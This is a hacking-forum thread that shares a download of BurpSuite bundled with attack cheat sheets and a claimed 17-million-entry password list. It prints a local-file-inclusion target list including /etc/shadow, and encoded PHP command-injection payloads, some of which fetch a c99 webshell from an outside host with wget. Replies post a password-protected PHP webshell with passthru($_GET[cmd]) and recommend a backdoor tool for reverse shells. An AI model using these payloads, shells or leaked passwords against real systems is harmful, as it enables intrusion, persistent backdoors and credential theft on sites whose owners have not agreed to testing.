BurpSuite v1.4 & loads of cheat sheet docs.

900913

Burpsuite can also be downloaded from here.
http://portswigger.net/burp/download.html

Example of zip contents and cheat sheet docs:





Contents of LFI folder:


Contents of LFI-InterestingFiles.txt

/etc/issue
/etc/motd
/etc/passwd
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/apache/logs/error.log
/apache/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/apache2/logs/error.log
/apache2/logs/access.log
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/xampp/logs/access_log
/opt/xampp/logs/error_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error.log
/opt/xampp/logs/access.log
/opt/xampp/logs/error.log
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/etc/apache2/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/var/www/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php5/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/usr/local/etc/apache/vhosts.conf
/etc/php.ini
/bin/php.ini
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/apache/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5\php.ini
/php4\php.ini
/php\php.ini
/PHP\php.ini
/WINDOWS\php.ini
/WINNT\php.ini
/apache\php\php.ini
/xampp\apache\bin\php.ini
/NetServer\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/var/cpanel/cpanel.config
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
/etc/logrotate.d/proftpd
/www/logs/proftpd.system.log
/var/log/proftpd
/etc/proftp.conf
/etc/protpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/proftpd/modules.conf
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers
/var/log/xferlog
/var/adm/log/xferlog
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/usr/sbin/pure-config.pl
/usr/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pure-ftpd/pureftpd.pdb
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/maillog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_rejectlog

SQLi2Shell folder, file Basic-cmd-code.txt

<?system('id');?>
<?system('uname -a');?>
<?php phpinfo(); ?>
<?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
<? system($_GET['c']); ?>
0x3c3f2073797374656d28245f4745545b2763275d293b203f3e
PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
%3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E
char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,39,93,41,59,32,63,62)
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=wget http://www.sh3ll.org/c99.txt -O shell.php
php://filter/resource=http://www.sh3ll.org/c99.txt?
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=index.php
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami
data:;base64,<? exec($_GET[cmd]); ?>&cmd=whoami
data:;base64,PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8+IiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8+Ij48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0+PHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8+PC9wcmU+PD8gZGllKCk7ID8+Cgo=
data:;base64,PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2BIiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8%2BIj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2BPHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8%2BPC9wcmU%2BPD8gZGllKCk7ID8%2BCgo%3D

There is loads of good info if the txt files.. and there are 17+million passwords.

Download here:

http://uploading.com/files/189f32f1/BURP-testHR-.zip/

infodox

WTF "sh3ll.org"... Change that if I was you

Don't we know that they had a *slight* tendancy to backdoor their webshells? They are also 404 at the moment...

They *may* have cleaned them up, but a few months ago their c99 had a function that mailed its URL to some email account.

BTW, I have a massive repo of those C99 variants and similar over at:
http://code.google.com/p/web-malware-collection/

900913

infodox wrote: »

WTF "sh3ll.org"... Change that if I was you

Don't we know that they had a *slight* tendancy to backdoor their webshells? They are also 404 at the moment...

They *may* have cleaned them up, but a few months ago their c99 had a function that mailed its URL to some email account.

BTW, I have a massive repo of those C99 variants and similar over at:
http://code.google.com/p/web-malware-collection/

It's only to give a guide, anyway you should always use your own shell. Your right, the sh3ll.org/c99.txt probably is backdoored.

If you were to use an untrusted shell you could always password protect it as soon as you upload it with something like:

<?php

$auth = 1;

$name='2d5faffb6ac2a8844c05386b381c4282'; //MD5 Encrypt name. Default name = 900913
$pass='97a37c0a629997e6c51116e0f8340404'; //MD5 Encrypt pass. Default pass = P4s5W0rD_900913

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
   {
   header('WWW-Authenticate: Basic realm="HELLO!"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b>????????? ???</b>");
   }
}
?>
//Shell goes here.

<pre>  <?PHP include($_GET[d]);?>  </pre>;

<pre>  <?PHP Passthru($_GET[cmd]);?>  </pre>;

And then patch the vulnerability in the site/server.

Here's a good free online tool for encoding/encrypting php scripts.

http://tools88.com/safe/online_base64_decode.php

:-)

infodox

Well as for shells w/ builtin protection - simply uploading the output from the following tool is my personal favourite (and is very often shown in my demos)
http://code.google.com/p/weevely/

It is quite possibly the most "friendly" backdoor, as it allows instant reverseshell (via /dev/tcp) and other useful things

Just output and pop it on your own host. Then use that in future